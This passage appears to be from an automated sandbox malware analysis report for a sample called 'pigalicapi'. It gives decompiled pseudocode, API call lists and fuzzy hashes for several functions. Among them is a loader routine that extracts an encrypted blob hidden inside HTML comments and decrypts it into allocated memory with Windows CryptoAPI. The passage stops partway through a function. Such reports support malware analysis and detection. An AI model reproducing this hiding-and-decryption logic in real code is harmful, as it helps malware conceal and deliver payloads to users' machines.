                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01178250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v13;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				char* _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				char _t48;
                                                                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                                                            				char _t63;
                                                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_v20 = _a4;
                                                                                                                                                                                                                                                                            					_v13 = 0;
                                                                                                                                                                                                                                                                            					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                            						_v32 = _t48;
                                                                                                                                                                                                                                                                            						_t63 =  *0x117c700; // 0x0
                                                                                                                                                                                                                                                                            						_v28 = _t63;
                                                                                                                                                                                                                                                                            						_t51 = E01177AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                            						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                            						_v24 = _t51;
                                                                                                                                                                                                                                                                            						if(_v24 == 0) {
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                            							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                            							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                            							if(_v36 != 0) {
                                                                                                                                                                                                                                                                            								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                            								_t58 = E01178090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                            								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                            								_v40 = _t58;
                                                                                                                                                                                                                                                                            								if(_v40 > 0) {
                                                                                                                                                                                                                                                                            									_v13 = 1;
                                                                                                                                                                                                                                                                            									_v8 = _v40;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L16:
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x01178256
                                                                                                                                                                                                                                                                            0x01178261
                                                                                                                                                                                                                                                                            0x01178285
                                                                                                                                                                                                                                                                            0x0117828f
                                                                                                                                                                                                                                                                            0x01178292
                                                                                                                                                                                                                                                                            0x01178296
                                                                                                                                                                                                                                                                            0x011782b1
                                                                                                                                                                                                                                                                            0x011782b6
                                                                                                                                                                                                                                                                            0x011782b9
                                                                                                                                                                                                                                                                            0x011782bf
                                                                                                                                                                                                                                                                            0x011782d6
                                                                                                                                                                                                                                                                            0x011782db
                                                                                                                                                                                                                                                                            0x011782de
                                                                                                                                                                                                                                                                            0x011782e5
                                                                                                                                                                                                                                                                            0x011782e7
                                                                                                                                                                                                                                                                            0x011782ed
                                                                                                                                                                                                                                                                            0x011782fb
                                                                                                                                                                                                                                                                            0x01178306
                                                                                                                                                                                                                                                                            0x0117830d
                                                                                                                                                                                                                                                                            0x01178318
                                                                                                                                                                                                                                                                            0x0117832e
                                                                                                                                                                                                                                                                            0x01178333
                                                                                                                                                                                                                                                                            0x01178336
                                                                                                                                                                                                                                                                            0x0117833d
                                                                                                                                                                                                                                                                            0x0117833f
                                                                                                                                                                                                                                                                            0x01178346
                                                                                                                                                                                                                                                                            0x01178346
                                                                                                                                                                                                                                                                            0x0117834f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117835a
                                                                                                                                                                                                                                                                            0x0117830d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011782e5
                                                                                                                                                                                                                                                                            0x01178296
                                                                                                                                                                                                                                                                            0x0117835f
                                                                                                                                                                                                                                                                            0x01178365

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000004,-->), ref: 01178300
                                                                                                                                                                                                                                                                              • Part of subcall function 01178090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 011780D8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID: -->$<!--
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                            • Opcode ID: 63b222d4f6f76eb456cb28b6d8aad8309ba76d873d58c02820ab500d469f3230
                                                                                                                                                                                                                                                                            • Instruction ID: 7e45bf808866bd71b130125b30282e668e82a5923787cda168ffd14974d2aa0c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63b222d4f6f76eb456cb28b6d8aad8309ba76d873d58c02820ab500d469f3230
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9316D70904249DFDF08DFACC548BEEBBB1EB48304F288959D515B7351D7749A84CBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0117A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            					if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                                                                                                                            						_v20 = _a16;
                                                                                                                                                                                                                                                                            						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                            						if(_t27 == 0) {
                                                                                                                                                                                                                                                                            							_v8 = _v20;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x0117a406
                                                                                                                                                                                                                                                                            0x0117a411
                                                                                                                                                                                                                                                                            0x0117a429
                                                                                                                                                                                                                                                                            0x0117a439
                                                                                                                                                                                                                                                                            0x0117a43b
                                                                                                                                                                                                                                                                            0x0117a43b
                                                                                                                                                                                                                                                                            0x0117a442
                                                                                                                                                                                                                                                                            0x0117a45c
                                                                                                                                                                                                                                                                            0x0117a464
                                                                                                                                                                                                                                                                            0x0117a469
                                                                                                                                                                                                                                                                            0x0117a480
                                                                                                                                                                                                                                                                            0x0117a488
                                                                                                                                                                                                                                                                            0x0117a48d
                                                                                                                                                                                                                                                                            0x0117a48d
                                                                                                                                                                                                                                                                            0x0117a494
                                                                                                                                                                                                                                                                            0x0117a494
                                                                                                                                                                                                                                                                            0x0117a464
                                                                                                                                                                                                                                                                            0x0117a4a0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0117A45C
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0117A480
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0117A494
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7da93234eb1473d4aa9a43bb13ab043f073ee41eda8aa2bf2e7e93b2e0fec91c
                                                                                                                                                                                                                                                                            • Instruction ID: 00f04de5443426e608bd980bf4d7a0cec98d61496f87d3a8c765ec5195875e4d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7da93234eb1473d4aa9a43bb13ab043f073ee41eda8aa2bf2e7e93b2e0fec91c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86114F75A00209EBEB29CF98D848BEE7BB4FF44304F08845CFA1597380D7B59A50CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C81F39(void* __ecx) {
                                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                                            				WCHAR* _t19;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                                                            				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                                            				if(_t19 != 0) {
                                                                                                                                                                                                                                                                            					_t12 = (E00C81F02(_t19) - _t19 >> 1) + (E00C81F02(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                                            					_t6 = E00C7BF3C(_t14, (E00C81F02(_t19) - _t19 >> 1) + (E00C81F02(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                                            					_t18 = _t6;
                                                                                                                                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                                                                                                                                            						E00C7ED10(_t18, _t19, _t12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E00C7A8FB(0);
                                                                                                                                                                                                                                                                            					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t18 = 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                                            0x00c81f39
                                                                                                                                                                                                                                                                            0x00c81f43
                                                                                                                                                                                                                                                                            0x00c81f47
                                                                                                                                                                                                                                                                            0x00c81f58
                                                                                                                                                                                                                                                                            0x00c81f5c
                                                                                                                                                                                                                                                                            0x00c81f61
                                                                                                                                                                                                                                                                            0x00c81f67
                                                                                                                                                                                                                                                                            0x00c81f6c
                                                                                                                                                                                                                                                                            0x00c81f71
                                                                                                                                                                                                                                                                            0x00c81f76
                                                                                                                                                                                                                                                                            0x00c81f7d
                                                                                                                                                                                                                                                                            0x00c81f49
                                                                                                                                                                                                                                                                            0x00c81f49
                                                                                                                                                                                                                                                                            0x00c81f49
                                                                                                                                                                                                                                                                            0x00c81f88

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C81F3D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C81F76
                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C81F7D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2716640707-0
                                                                                                                                                                                                                                                                            • Opcode ID: a90ed3151df0ed398b273b9c8ceddb79ebad7fa95205ee1d55ee4006c6382cd4
                                                                                                                                                                                                                                                                            • Instruction ID: aec0160e543dca4e02024fda9fe666269fc1d5deab29a63dcb7b2613b3e54bbe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a90ed3151df0ed398b273b9c8ceddb79ebad7fa95205ee1d55ee4006c6382cd4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E02B371045206BA22233BA7C49FAF364CCFD27B9B290115F90882241DF208D0312BA
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01178090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v16 = _a8;
                                                                                                                                                                                                                                                                            					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t71;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_t73 = E01171390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                            						_v20 = _t73;
                                                                                                                                                                                                                                                                            						if(_v20 != 0) {
                                                                                                                                                                                                                                                                            							_v24 = _v12;
                                                                                                                                                                                                                                                                            							_v28 = _v20;
                                                                                                                                                                                                                                                                            							_v32 = E011787B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                            							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                            								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                            								_v36 = E011716F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                            								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                            									E01178630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                            									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                            									E01178630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                            									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                            									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                            									_t91 = E01178A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x1183410, 0x254); // executed
                                                                                                                                                                                                                                                                            									if(_t91 != 0) {
                                                                                                                                                                                                                                                                            										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            										 *_a12 = _t93;
                                                                                                                                                                                                                                                                            										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                            											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                            											E01177B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                            											 *_a16 = _v52;
                                                                                                                                                                                                                                                                            											_v8 = _v52;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v8 == 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x01178096
                                                                                                                                                                                                                                                                            0x011780a1
                                                                                                                                                                                                                                                                            0x01178246
                                                                                                                                                                                                                                                                            0x0117824c
                                                                                                                                                                                                                                                                            0x011780c5
                                                                                                                                                                                                                                                                            0x011780c8
                                                                                                                                                                                                                                                                            0x011780d8
                                                                                                                                                                                                                                                                            0x011780de
                                                                                                                                                                                                                                                                            0x011780e5
                                                                                                                                                                                                                                                                            0x011780fb
                                                                                                                                                                                                                                                                            0x01178103
                                                                                                                                                                                                                                                                            0x0117810a
                                                                                                                                                                                                                                                                            0x01178113
                                                                                                                                                                                                                                                                            0x01178119
                                                                                                                                                                                                                                                                            0x0117812d
                                                                                                                                                                                                                                                                            0x01178134
                                                                                                                                                                                                                                                                            0x01178140
                                                                                                                                                                                                                                                                            0x01178149
                                                                                                                                                                                                                                                                            0x01178162
                                                                                                                                                                                                                                                                            0x0117816b
                                                                                                                                                                                                                                                                            0x0117817e
                                                                                                                                                                                                                                                                            0x0117818c
                                                                                                                                                                                                                                                                            0x0117819e
                                                                                                                                                                                                                                                                            0x011781b1
                                                                                                                                                                                                                                                                            0x011781d3
                                                                                                                                                                                                                                                                            0x011781d8
                                                                                                                                                                                                                                                                            0x011781e2
                                                                                                                                                                                                                                                                            0x011781f1
                                                                                                                                                                                                                                                                            0x011781fa
                                                                                                                                                                                                                                                                            0x01178202
                                                                                                                                                                                                                                                                            0x0117820e
                                                                                                                                                                                                                                                                            0x01178219
                                                                                                                                                                                                                                                                            0x01178227
                                                                                                                                                                                                                                                                            0x0117822c
                                                                                                                                                                                                                                                                            0x0117822c
                                                                                                                                                                                                                                                                            0x01178202
                                                                                                                                                                                                                                                                            0x011781e2
                                                                                                                                                                                                                                                                            0x0117816b
                                                                                                                                                                                                                                                                            0x01178134
                                                                                                                                                                                                                                                                            0x01178233
                                                                                                                                                                                                                                                                            0x01178240
                                                                                                                                                                                                                                                                            0x01178240
                                                                                                                                                                                                                                                                            0x01178233
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011780e5

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 011780D8
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01178240
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178AD3
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: GetLastError.KERNEL32 ref: 01178ADD
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178B0C
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 01178B37
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 01178B5E
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 01178B7A
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDestroyKey.ADVAPI32(00000000), ref: 01178B87
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDestroyKey.ADVAPI32(00000000), ref: 01178B91
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178B9D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 011781F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 142027497-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7d736a1545d0a8f47227ecd3c6334084986f957235c3b2387e4762dfaae34df8
                                                                                                                                                                                                                                                                            • Instruction ID: bf928f8a917f36baa458e2fd8228beeddbfcc9897163eef5fda3b825fd351ee8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d736a1545d0a8f47227ecd3c6334084986f957235c3b2387e4762dfaae34df8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB5108B4E00209AFDB18DF98D984BAEB7B5FF48305F148159E915BB381D770AA40CFA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E00C7B448(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				char _v264;
                                                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                                                            				char _v776;
                                                                                                                                                                                                                                                                            				char _v1800;
                                                                                                                                                                                                                                                                            				char _v1814;
                                                                                                                                                                                                                                                                            				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                                            				intOrPtr _v1824;
                                                                                                                                                                                                                                                                            				signed int _v1828;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                                            				char _t73;
                                                                                                                                                                                                                                                                            				char _t74;
                                                                                                                                                                                                                                                                            				signed char _t75;
                                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                                            				signed char _t86;
                                                                                                                                                                                                                                                                            				char _t87;
                                                                                                                                                                                                                                                                            				char _t90;
                                                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                                                                                                                            				signed int _t95;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				char* _t97;
                                                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                                                                                                                            				_t63 =  *0xd0db44; // 0xce6c4b51
                                                                                                                                                                                                                                                                            				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                                            				_t101 = _a4;
                                                                                                                                                                                                                                                                            				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                                            					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                            					_t90 = 0;
                                                                                                                                                                                                                                                                            					_t67 = 0xffffff9f;
                                                                                                                                                                                                                                                                            					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                                            					__eflags = _t68;
                                                                                                                                                                                                                                                                            					_v1828 = _t68;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                                            						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                                            						_v1824 = _t69;
                                                                                                                                                                                                                                                                            						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                                            						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                                            							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                                            							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                                            								 *_t97 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                                            								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                                            								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                            								__eflags =  *_t57;
                                                                                                                                                                                                                                                                            								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                                            								_t73 = _t59;
                                                                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                            							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                                            							_t73 = _t54;
                                                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                                                            							 *_t97 = _t73;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t68 = _v1828;
                                                                                                                                                                                                                                                                            						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                            						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                                            					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t74 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                                            						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                                            					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                                            					_t75 = _v1814;
                                                                                                                                                                                                                                                                            					_t93 =  &_v1814;
                                                                                                                                                                                                                                                                            					_v264 = 0x20;
                                                                                                                                                                                                                                                                            					while(1) {
